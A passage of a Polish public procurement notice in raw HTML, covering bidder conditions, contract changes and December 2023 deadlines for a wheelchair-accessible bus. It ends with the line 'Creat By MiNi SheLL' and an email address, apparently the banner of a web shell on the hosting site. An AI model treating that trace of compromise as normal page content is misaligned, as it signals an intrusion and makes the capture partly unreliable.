class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu. <br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia wymagań w zakresie ww. warunku <br/> <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia wymagań w zakresie ww. warunku <br/> <br/>3)	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia wymagań w zakresie ww. warunku <br/> <br/>4)	zdolności technicznej lub zawodowej: <br/>Wykonawca spełni warunek, jeżeli: <br/>a) wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej: jedną dostawę fabrycznie nowego autobusu przystosowanego do przewozu osób niepełnosprawnych w tym na wózkach inwalidzkich – załącznik do oferty (niewymagany na etapie składania ofert); <br/> <br/>UWAGA: Do wykazu muszą zostać dołączone dowody potwierdzające, iż wskazane dostawy zostały wykonane należycie (np. referencje, protokół odbioru) <br/> <br/>3.	Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <br/> <br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie (Załącznik do oferty), z którego wynika, które dostawy wykonają poszczególni wykonawcy w odniesieniu do warunków, które zostały opisane w ust. 2. <br/>5.	Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie stawia wymagań w zakresie ww. warunku</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu. <br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia wymagań w zakresie ww. warunku <br/> <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia wymagań w zakresie ww. warunku <br/> <br/>3)	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia wymagań w zakresie ww. warunku <br/> <br/>4)	zdolności technicznej lub zawodowej: <br/>Wykonawca spełni warunek, jeżeli: <br/>a) wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej: jedną dostawę fabrycznie nowego autobusu przystosowanego do przewozu osób niepełnosprawnych w tym na wózkach inwalidzkich – załącznik do oferty (niewymagany na etapie składania ofert); <br/> <br/>UWAGA: Do wykazu muszą zostać dołączone dowody potwierdzające, iż wskazane dostawy zostały wykonane należycie (np. referencje, protokół odbioru) <br/> <br/>3.	Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <br/> <br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie (Załącznik do oferty), z którego wynika, które dostawy wykonają poszczególni wykonawcy w odniesieniu do warunków, które zostały opisane w ust. 2. <br/>5.	Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie stawia wymagań w zakresie ww. warunku <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający nie stawia wymagań w zakresie ww. warunku <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w pkt.<br/>10.1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane/dostawy/usługi (w zależności od tego co jest przedmiotem postępowania) wykonają poszczególni<br/>wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający i Wykonawca mają prawo za obopólną zgodą do wprowadzania zmian <br/>w przypadku zaistnienia co najmniej jednej z następujących okoliczności:<br/>1)	pojawienia się na rynku po zawarciu Umowy nowych rozwiązań technicznych lub technologicznych pozwalających na zmniejszenie kosztów eksploatacji pojazdu lub uzyskanie korzystniejszych parametrów technicznych,<br/>2)	zmiana może przyczynić się do usprawnienia jego właściwości użytkowych, podniesienia efektywności działania pojazdu,<br/>3)	zaniechania lub wycofania z produkcji określonych materiałów lub elementów wskazanych w opisie przedmiotu zamówienia,<br/>4)	zmiany obowiązujących przepisów prawnych lub norm.<br/>5)	w przypadku zaistnienia innej istotnej okoliczności powodującej, że wykonanie Umowy bez dokonania jej zmian nie leży w interesie publicznym, czego nie można było przewidzieć w na etapie zawierania Umowy,<br/>6)	zmiany parametrów przy zachowaniu parametrów równoważności,<br/>2.	Zmiany, o których mowa wyżej, nie mogą powodować wzrostu wynagrodzenia umownego Wykonawcy, ani zmienić parametrów istotnych jego oferty.<br/>3.	W przypadku, o którym mowa w ust. 1 pkt 4, umowa podlegać będzie zmianie w takim zakresie, w jakim zmiany są niezbędne do dostosowania Umowy do zmienionych przepisów.<br/>4.	Zamawiający dopuszcza zmianę terminu realizacji zamówienia w przypadku, gdy opóźnienie w wykonaniu przedmiotu umowy spowodowane będzie okolicznością, która wystąpiła z przyczyn niezależnych od Wykonawcy po zawarciu umowy, które Zamawiający uzna za uzasadniające zmianę terminu,<br/><br/>5.	Wniosek danej strony o dokonanie zmian w Umowie powinien być składany na piśmie i zawierać dokładny opis proponowanej zmiany. Do wniosku należy załączyć dokumenty uzasadniające wprowadzenie zmiany. Po otrzymaniu wniosku o dokonanie zmiany lub po złożeniu propozycji zmiany, druga strona pisemnie poinformuje stronę składającą wniosek o możliwości wprowadzenia zmian.<br/>6.	Zmiany Umowy mogą zostać dokonane w formie pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-06 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com